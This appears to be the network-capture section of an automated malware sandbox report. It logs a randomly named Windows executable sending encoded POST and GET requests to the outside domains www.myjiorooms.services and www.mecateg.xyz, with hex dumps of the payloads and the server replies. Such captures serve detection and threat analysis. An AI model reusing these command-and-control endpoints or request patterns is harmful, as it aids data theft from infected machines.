                                                                                                                Data Raw: 5a 5a 59 3d 50 48 4c 62 68 31 42 69 36 77 6f 51 5a 4b 76 44 4b 4e 57 67 63 48 54 4a 56 50 46 70 72 5a 31 31 76 32 6e 31 75 6f 46 73 6f 69 67 76 6e 62 50 54 75 56 44 4f 7a 4e 6d 63 6c 52 46 4e 33 71 32 64 57 6e 45 46 54 44 4f 6c 6c 38 42 72 61 4a 69 2f 79 6f 43 31 4e 52 59 74 38 61 50 77 6b 52 53 74 65 30 55 61 35 50 57 6c 2b 47 45 2f 36 63 72 74 63 71 45 65 41 41 6b 6f 75 41 4d 2f 4c 57 6a 4d 6a 71 73 50 61 2f 6e 6f 41 52 75 65 73 36 37 61 61 4a 71 4d 73 47 54 65 41 36 42 2f 49 70 75 55 2f 4b 5a 51 35 64 48 6a 41 69 72 36 30 37 6d 33 62 35 36 2b 70 2f 51 4d 4c 62 66 78 69 45 6f 69 67 63 46 4f 75 76 53 78 53 70 73 51 79 59 61 54 61 51 3d 3d
                                                                                                                Data Ascii: ZZY=PHLbh1Bi6woQZKvDKNWgcHTJVPFprZ11v2n1uoFsoigvnbPTuVDOzNmclRFN3q2dWnEFTDOll8BraJi/yoC1NRYt8aPwkRSte0Ua5PWl+GE/6crtcqEeAAkouAM/LWjMjqsPa/noARues67aaJqMsGTeA6B/IpuU/KZQ5dHjAir607m3b56+p/QMLbfxiEoigcFOuvSxSpsQyYaTaQ==


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                10192.168.2.7499823.33.130.190801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:06:36.511487961 CEST715OUTPOST /bp9c/ HTTP/1.1
                                                                                                                Host: www.myjiorooms.services
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.myjiorooms.services
                                                                                                                Content-Length: 236
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.myjiorooms.services/bp9c/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 50 48 4c 62 68 31 42 69 36 77 6f 51 5a 71 66 44 5a 36 43 67 5a 6e 54 49 61 76 46 70 77 70 31 78 76 32 72 31 75 71 6f 6e 6f 55 59 76 6e 36 2f 54 74 55 44 4f 77 4e 6d 63 74 78 46 4d 36 4b 32 47 57 6e 4a 77 54 48 47 6c 6c 39 68 72 61 4a 79 2f 6e 50 75 79 4e 42 59 7a 70 4b 50 79 72 78 53 74 65 30 55 61 35 50 43 63 2b 47 63 2f 36 4e 62 74 64 4f 51 42 65 51 6b 72 74 41 4d 2f 59 47 6a 49 6a 71 73 74 61 38 6a 4f 41 54 6d 65 73 36 72 61 61 34 71 4e 69 47 54 63 66 71 41 36 44 61 7a 41 34 36 42 2b 39 2f 2f 59 45 53 48 2f 31 4e 37 56 42 62 32 53 33 75 6f 33 50 5a 37 48 31 69 31 58 69 64 42 57 6a 4e 6d 51 4e 65 4a 36 2f 4b 37 58 4d 6d 53 2b 6c 41 41 54 34 38 52 76 33 53 34 53 61 38 52 71 61 31 4d 3d
                                                                                                                Data Ascii: ZZY=PHLbh1Bi6woQZqfDZ6CgZnTIavFpwp1xv2r1uqonoUYvn6/TtUDOwNmctxFM6K2GWnJwTHGll9hraJy/nPuyNBYzpKPyrxSte0Ua5PCc+Gc/6NbtdOQBeQkrtAM/YGjIjqsta8jOATmes6raa4qNiGTcfqA6DazA46B+9//YESH/1N7VBb2S3uo3PZ7H1i1XidBWjNmQNeJ6/K7XMmS+lAAT48Rv3S4Sa8Rqa1M=


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                11192.168.2.7499833.33.130.190801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:06:39.058021069 CEST1728OUTPOST /bp9c/ HTTP/1.1
                                                                                                                Host: www.myjiorooms.services
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.myjiorooms.services
                                                                                                                Content-Length: 1248
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.myjiorooms.services/bp9c/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 50 48 4c 62 68 31 42 69 36 77 6f 51 5a 71 66 44 5a 36 43 67 5a 6e 54 49 61 76 46 70 77 70 31 78 76 32 72 31 75 71 6f 6e 6f 55 51 76 6d 49 6e 54 76 33 72 4f 78 4e 6d 63 78 68 46 42 36 4b 32 4c 57 6e 51 34 54 48 43 54 6c 35 52 72 5a 71 4b 2f 6a 4f 75 79 44 42 59 7a 78 36 50 7a 6b 52 54 33 65 30 46 54 35 50 53 63 2b 47 63 2f 36 4f 7a 74 4c 71 45 42 63 51 6b 6f 75 41 4e 77 4c 57 69 76 6a 75 35 51 61 39 58 34 41 6a 47 65 31 61 62 61 63 61 79 4e 75 47 54 61 63 71 41 63 44 61 2f 32 34 36 64 79 39 37 32 39 45 52 58 2f 30 61 43 64 53 61 79 45 74 2f 78 74 43 62 37 79 2f 42 31 33 37 4d 74 6d 70 63 79 4a 52 65 31 42 2f 4c 50 59 45 54 4c 42 7a 41 78 73 7a 4d 35 2b 6b 6e 78 64 4f 63 4a 50 42 69 37 78 2b 44 66 34 2b 59 35 45 43 52 41 61 45 42 6d 46 54 33 6a 6e 70 69 31 6f 6f 68 65 59 34 32 43 53 62 69 36 63 43 6b 77 54 30 61 50 58 4a 63 4c 73 34 66 38 6e 49 2f 6b 65 61 54 67 33 6e 56 43 4b 79 70 51 4b 43 37 56 73 72 31 79 66 73 64 57 66 70 32 4b 6c 36 47 79 7a 63 62 69 45 42 45 4c 46 4b 77 72 79 53 72 [TRUNCATED]
                                                                                                                Data Ascii: ZZY=PHLbh1Bi6woQZqfDZ6CgZnTIavFpwp1xv2r1uqonoUQvmInTv3rOxNmcxhFB6K2LWnQ4THCTl5RrZqK/jOuyDBYzx6PzkRT3e0FT5PSc+Gc/6OztLqEBcQkouANwLWivju5Qa9X4AjGe1abacayNuGTacqAcDa/246dy9729ERX/0aCdSayEt/xtCb7y/B137MtmpcyJRe1B/LPYETLBzAxszM5+knxdOcJPBi7x+Df4+Y5ECRAaEBmFT3jnpi1ooheY42CSbi6cCkwT0aPXJcLs4f8nI/keaTg3nVCKypQKC7Vsr1yfsdWfp2Kl6GyzcbiEBELFKwrySr8eBNzGWro9xyhcHdfX8uBHvBo4+CKGkJGdc8VuSa3xt08DTKp4tViEj7h3L7/tgWCJjONPwzMWvoO7tXk7crVTX/4OJRBHWGEWcJYsNaan36OoTiJQ7ewWKeYAISdWfOoPnZwxv6R9Oeo1DHh8Ugk7kSnehZpHcMNQAm+FMZR5Zq4W6zVAvUgr8KgPJZIQAdX1NfA/bSgh/C5uWwETRpV8Eb+XkKgPJJEAm8pTU3PbbuQLOKId0wJrSuixo/ndZbtHpEcqetc9UnExqwqv0PNWmJaX8Rw1y9DbSwyFQ/ekwP+J84lKNKYDz5rtAbZCkC+IkO2fY1xq1mhUFXa1XiBqAzK5vbRel7k9HDKnivzop9BttPXe+m22iisZ/bmc1BozHXb90FGsf47IGcXZT3V7sKa4shN1IKTgdp3hdZrgqCFgOsysEH9iMImT+gyA6GBHzETUkInFCF1xd5bMBZXD9Vt9TfPvSHK5bQWPGMWxJ9XQDA+u+kv3irSCykXw5/wwRDlqmjEHvpaseHKBOKq9fmGqefES+dmWDAvWy9GSWCuL1MbpFIKzRvWEJs8bhVoOkNICFl9RiHcxOWxEOu7WavAL9ATyWjaq3TlYZaGO0p5rI+oiW4vwsGLQnIWPMP4oEcbhBT2Av7+U0L/j2wFEv0+Y5mt6UYdv [TRUNCATED]


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                12192.168.2.7499843.33.130.190801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:06:41.706000090 CEST422OUTGET /bp9c/?ZZY=CFj7iDxn1x8AZpvFPceYGF6mfIwPwoMTrHXd5ZNPnjoM55LZ4XrC1cu6kzZqztyAGGEhFACZ681UEqmRh4qhBCgu4rL42B/pdGdLhtvwmGlR74+AXtAhf2M5tQk/HW327Y9QXMr8MgHb&mHm0o=rrqhoH HTTP/1.1
                                                                                                                Host: www.myjiorooms.services
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Connection: close
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Oct 9, 2024 14:06:49.193428040 CEST412INHTTP/1.1 200 OK
                                                                                                                Server: openresty
                                                                                                                Date: Wed, 09 Oct 2024 12:06:49 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 272
                                                                                                                Connection: close
                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 5a 5a 59 3d 43 46 6a 37 69 44 78 6e 31 78 38 41 5a 70 76 46 50 63 65 59 47 46 36 6d 66 49 77 50 77 6f 4d 54 72 48 58 64 35 5a 4e 50 6e 6a 6f 4d 35 35 4c 5a 34 58 72 43 31 63 75 36 6b 7a 5a 71 7a 74 79 41 47 47 45 68 46 41 43 5a 36 38 31 55 45 71 6d 52 68 34 71 68 42 43 67 75 34 72 4c 34 32 42 2f 70 64 47 64 4c 68 74 76 77 6d 47 6c 52 37 34 2b 41 58 74 41 68 66 32 4d 35 74 51 6b 2f 48 57 33 32 37 59 39 51 58 4d 72 38 4d 67 48 62 26 6d 48 6d 30 6f 3d 72 72 71 68 6f 48 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ZZY=CFj7iDxn1x8AZpvFPceYGF6mfIwPwoMTrHXd5ZNPnjoM55LZ4XrC1cu6kzZqztyAGGEhFACZ681UEqmRh4qhBCgu4rL42B/pdGdLhtvwmGlR74+AXtAhf2M5tQk/HW327Y9QXMr8MgHb&mHm0o=rrqhoH"}</script></head></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                13192.168.2.749985162.0.238.238801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:06:54.263029099 CEST671OUTPOST /sq12/ HTTP/1.1
                                                                                                                Host: www.mecateg.xyz
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.mecateg.xyz
                                                                                                                Content-Length: 216
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.mecateg.xyz/sq12/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 2b 34 73 32 7a 57 51 43 4a 41 33 47 43 4f 67 50 6f 42 69 44 79 4f 4b 39 4a 53 6d 69 58 34 70 65 77 42 4d 32 4d 6d 35 78 63 7a 50 45 54 4c 7a 51 66 56 75 47 57 71 4c 6a 46 2b 56 42 45 33 44 68 43 6a 31 67 65 65 6a 45 75 71 59 70 54 70 2f 37 57 6f 56 47 33 59 56 57 58 67 6d 32 4c 5a 52 36 51 32 75 6e 69 30 59 4f 36 47 6a 39 2b 72 59 6d 30 61 61 56 53 30 72 58 55 35 39 44 70 58 6d 48 69 4d 68 6e 78 5a 52 33 79 72 35 54 43 32 70 51 37 35 68 42 78 50 44 63 45 51 43 47 34 4c 36 39 37 66 55 7a 71 76 44 36 44 55 39 4a 2f 35 4f 6b 79 4c 33 71 72 43 56 47 68 73 39 4c 4f 69 61 4c 48 52 33 4a 76 72 62 67 31 2f 32 4e 53 6c 47 42 64 41 3d 3d
                                                                                                                Data Ascii: ZZY=+4s2zWQCJA3GCOgPoBiDyOK9JSmiX4pewBM2Mm5xczPETLzQfVuGWqLjF+VBE3DhCj1geejEuqYpTp/7WoVG3YVWXgm2LZR6Q2uni0YO6Gj9+rYm0aaVS0rXU59DpXmHiMhnxZR3yr5TC2pQ75hBxPDcEQCG4L697fUzqvD6DU9J/5OkyL3qrCVGhs9LOiaLHR3Jvrbg1/2NSlGBdA==


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                14192.168.2.749986162.0.238.238801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:06:56.812716961 CEST691OUTPOST /sq12/ HTTP/1.1
                                                                                                                Host: www.mecateg.xyz
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.mecateg.xyz
                                                                                                                Content-Length: 236
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.mecateg.xyz/sq12/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 2b 34 73 32 7a 57 51 43 4a 41 33 47 44 71 6b 50 74 6d 32 44 30 75 4b 2b 56 43 6d 69 4f 49 70 53 77 42 51 32 4d 6c 31 68 66 41 37 45 53 76 33 51 4e 45 75 47 56 71 4c 6a 4c 65 56 41 4c 58 44 36 43 6a 34 56 65 63 33 45 75 71 4d 70 54 74 7a 37 57 66 70 48 34 6f 56 55 43 51 6d 30 46 35 52 36 51 32 75 6e 69 30 4e 47 36 47 37 39 2f 61 6f 6d 37 65 4f 57 52 30 72 57 54 35 39 44 2f 6e 6d 44 69 4d 68 42 78 62 31 64 79 70 42 54 43 32 35 51 38 6f 68 4f 6b 66 44 61 4b 77 43 55 38 59 4f 33 38 2f 55 70 6b 4f 65 67 4c 46 68 68 7a 76 54 47 6f 70 37 47 31 54 74 39 6c 75 5a 39 5a 45 48 2b 46 51 7a 52 69 4a 76 42 71 49 54 6e 66 33 6e 46 4c 34 75 4f 5a 79 45 57 69 7a 66 71 61 2f 69 59 61 65 37 44 54 49 51 3d
                                                                                                                Data Ascii: ZZY=+4s2zWQCJA3GDqkPtm2D0uK+VCmiOIpSwBQ2Ml1hfA7ESv3QNEuGVqLjLeVALXD6Cj4Vec3EuqMpTtz7WfpH4oVUCQm0F5R6Q2uni0NG6G79/aom7eOWR0rWT59D/nmDiMhBxb1dypBTC25Q8ohOkfDaKwCU8YO38/UpkOegLFhhzvTGop7G1Tt9luZ9ZEH+FQzRiJvBqITnf3nFL4uOZyEWizfqa/iYae7DTIQ=
                                                                                                                Oct 9, 2024 14:06:57.416392088 CEST595INHTTP/1.1 404 Not Found
                                                                                                                Date: Wed, 09 Oct 2024 12:06:57 GMT
                                                                                                                Server: Apache
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                Content-Length: 389
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                Connection: close
                                                                                                                Content-Type: text/html
                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                15192.168.2.749987162.0.238.238801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:06:59.364028931 CEST1704OUTPOST /sq12/ HTTP/1.1
                                                                                                                Host: www.mecateg.xyz
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.mecateg.xyz
                                                                                                                Content-Length: 1248
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.mecateg.xyz/sq12/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 2b 34 73 32 7a 57 51 43 4a 41 33 47 44 71 6b 50 74 6d 32 44 30 75 4b 2b 56 43 6d 69 4f 49 70 53 77 42 51 32 4d 6c 31 68 66 42 44 45 54 61 6a 51 66 7a 43 47 55 71 4c 6a 44 2b 56 4e 4c 58 43 34 43 6a 77 52 65 63 72 79 75 70 30 70 56 4f 37 37 51 75 70 48 6a 59 56 55 64 41 6d 78 4c 5a 52 72 51 32 2b 6a 69 30 64 47 36 47 37 39 2f 5a 77 6d 79 71 61 57 58 30 72 58 55 35 39 35 70 58 6e 57 69 4d 5a 2f 78 62 78 6e 7a 59 68 54 42 58 4a 51 36 61 4a 4f 6c 2f 44 59 4e 77 44 48 38 59 54 74 38 2f 34 44 6b 4f 72 33 4c 48 78 68 7a 72 4f 42 74 72 76 70 6a 67 55 70 6e 59 5a 59 66 6e 76 76 48 77 6e 6f 38 71 4c 30 6d 62 69 54 59 31 72 54 4c 73 50 30 44 68 63 30 73 41 7a 2f 62 4b 6e 73 4d 66 72 69 4a 76 7a 6b 32 2b 41 33 2f 77 33 76 38 2b 6b 57 41 45 35 76 35 6a 4a 4a 65 4b 71 74 6f 56 6f 4d 57 64 4f 59 7a 6e 66 2f 48 64 4a 6f 4f 7a 37 5a 49 31 77 6f 6b 39 65 65 39 55 62 30 35 6f 7a 37 4b 79 44 41 2f 46 73 68 34 4c 43 4b 36 65 50 68 7a 6c 6f 30 4f 2f 4e 32 62 33 77 32 72 48 79 50 50 6c 5a 6b 72 4d 2f 79 31 59 [TRUNCATED]
                                                                                                                Data Ascii: ZZY=+4s2zWQCJA3GDqkPtm2D0uK+VCmiOIpSwBQ2Ml1hfBDETajQfzCGUqLjD+VNLXC4CjwRecryup0pVO77QupHjYVUdAmxLZRrQ2+ji0dG6G79/ZwmyqaWX0rXU595pXnWiMZ/xbxnzYhTBXJQ6aJOl/DYNwDH8YTt8/4DkOr3LHxhzrOBtrvpjgUpnYZYfnvvHwno8qL0mbiTY1rTLsP0Dhc0sAz/bKnsMfriJvzk2+A3/w3v8+kWAE5v5jJJeKqtoVoMWdOYznf/HdJoOz7ZI1wok9ee9Ub05oz7KyDA/Fsh4LCK6ePhzlo0O/N2b3w2rHyPPlZkrM/y1Ydy1mgLde//KdvAoMsB8JNmvT18wgXp6G/CvboaYjtRo3l4xQDWRMfBP5ph8lQdEuGIzxEp/7v/LK/0eOb+ntW11hiMvISzUCZ0mDmihxuT3QSFra57woGMKsHaq2btvzHJmVUDcphK5/mm2xmDaLNOdnPl8m1nQERQg8QGFLKqpD1ix8AqlxVIubPkPX7rQcc0VD+L7+cMbv8tSz0JR5PvYOl1YnWIwqqujrvki3nz40duDYIzgdbMBIuuN3GpHrBvvqBB3nX0VaMelOIOYoUaDOQgB+Om/iyGVVXTGnu3YGe5NsgqN5EwNTcG1GVUz4N+AxEC9pz89e1VsZz0LV4dyQH5HdErWUuQbDKF7/mMRlukDQhc8GmsVtZenHPbQ4L+Yb+nrZf7G+lVw5ynkfnGJ1UuIMF1eB1J4cYwo1a/3zJaGRVzbN9B461ZwFT0XCNhn2A+O3haC1J66YijNj4fu+SJLakdPRwHJNry5Om0YYgxoZ7fijbdTRPzfWHIA8iv3P7I/iJhvwptie9nLtIBgauYOfaZ/4EX02mZc1aHR0amPxy6OogX9w/m1kuujQ/wPXiyR2GhIrE01yKxz+1Pey0x3eJylXqJC0tQ+bG+C7tpYTmoep9pDtLDYwpatE2seSwqGLyuZlJrFSFSg5Nyl/dC+xi5rRVe [TRUNCATED]
                                                                                                                Oct 9, 2024 14:06:59.941700935 CEST595INHTTP/1.1 404 Not Found
                                                                                                                Date: Wed, 09 Oct 2024 12:06:59 GMT
                                                                                                                Server: Apache
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                Content-Length: 389
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                Connection: close
                                                                                                                Content-Type: text/html
                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                16192.168.2.749988162.0.238.238801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:07:01.898432016 CEST414OUTGET /sq12/?ZZY=z6EWwjUgJz2bJPVNnwixtdiBclz6U+1c8CkWN3ljQgjJGrzDNHqxSoLtP95ZDgz7MgUxfMzo2dU5U8jEaokJ+YFKTiu0SNRlbEWC0HQQ7kWDv/RczpK4Ywebc8IjilGLuKMcxKVh8K9W&mHm0o=rrqhoH HTTP/1.1
                                                                                                                Host: www.mecateg.xyz
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Connection: close
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Oct 9, 2024 14:07:02.483592987 CEST610INHTTP/1.1 404 Not Found
                                                                                                                Date: Wed, 09 Oct 2024 12:07:02 GMT
                                                                                                                Server: Apache
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                Content-Length: 389
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                Connection: close
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
